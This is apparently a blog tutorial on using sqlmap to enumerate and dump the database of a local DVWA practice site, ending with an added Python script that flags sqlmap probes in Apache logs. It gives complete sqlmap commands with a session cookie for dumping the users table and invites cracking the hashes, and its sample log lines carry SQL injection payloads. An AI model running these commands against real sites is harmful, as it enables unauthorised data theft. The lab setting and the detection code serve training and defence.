Hello, buddy! Have you ever wondered why Oracle Corp would monopolize and commercialize MySQL while many people already depend on it in their development? You do not need to answer that, seriously, because we aren't going to talk about it now. Instead, we're going to talk about how to use sqlmap to extract a database.
- You have apache2, mysql and phpmyadmin installed on your system.
- I use DVWA as the victim site; click here for more information and the download link.
- You have found the vulnerability in the DVWA site. Click here for the tutorial.
- I use Mantra and Burp Suite for IG (information gathering). Click here for the tutorial! It is important to find the cookie.
So let's rock, here are the steps:
- First read the manual by typing "./sqlmap.py -h".
- If you already know the usage, let's continue. The syntax is "./sqlmap.py -u victim_url --cookie=Cookie --dbs". If the targeted website has a login page, we have to find the cookie; we can use Burp Suite for that. If not, go straight to the vulnerable website with "./sqlmap.py -u victim_url --dbs". Note the difference between the two: "-u" is for the URL and "--dbs" is for capturing the database names. In my case it looks like this:
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02" --dbs
- We now have the database name, "dvwa"; the next job is to get the table names.
- Don't celebrate yet, we still have things to do.
Can you see the databases? Now guess which one is the relevant one. Yes, you are right, dvwa is the one we are looking for 😀
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02" -D dvwa --tables
Sure enough, you can see the table names; nothing is left to do but dump the users table.
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02" -T users --dump
Voilà... the usernames and passwords appear. It seems the passwords are encrypted (md5 maybe). Your last duty is to solve it 😛
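Seen from the server side, every request sqlmap sends in the steps above lands in the Apache access log of the DVWA host. The following is an added example, not part of the original post: it flags such lines by the tool's default User-Agent prefix and by SQL syntax in the `id` parameter. The log lines are constructed, and the function names and the assumption of Apache's "combined" log format are mine.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# SQL syntax that does not belong in a numeric id value (heuristic, not exhaustive).
SQLI_RE = re.compile(
    r"(?i)\b(?:union\s+(?:all\s+)?select|information_schema|sleep\s*\(|benchmark\s*\()|'|--"
)

# Constructed sample lines; the path mirrors the DVWA URL used in this post.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4521 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20-&Submit=Submit HTTP/1.1" 200 4630 "-" "sqlmap/1.x (https://sqlmap.org)"',
    '127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%20AND%20SLEEP%285%29&Submit=Submit HTTP/1.1" 200 4521 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

def classify(line):
    """Return the reasons an access-log line looks like automated SQLi probing."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not a combined-format line; nothing to judge
    reasons = []
    # The User-Agent is client-controlled, so treat it as a cheap first signal only.
    if m["ua"].lower().startswith("sqlmap/"):
        reasons.append("sqlmap-user-agent")
    # parse_qs percent-decodes the value, so encoded payloads are checked in clear form.
    params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    if any(SQLI_RE.search(v) for v in params.get("id", [])):
        reasons.append("sql-syntax-in-id")
    return reasons

def scan(lines):
    """Map line index -> reasons, for flagged lines only."""
    return {i: r for i, line in enumerate(lines) if (r := classify(line))}

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_LOG).items():
        print(idx, reasons)
```

The parameter check is the more durable of the two signals, and the lasting fix remains a parameterized query on the server so that the `id` value is never interpreted as SQL.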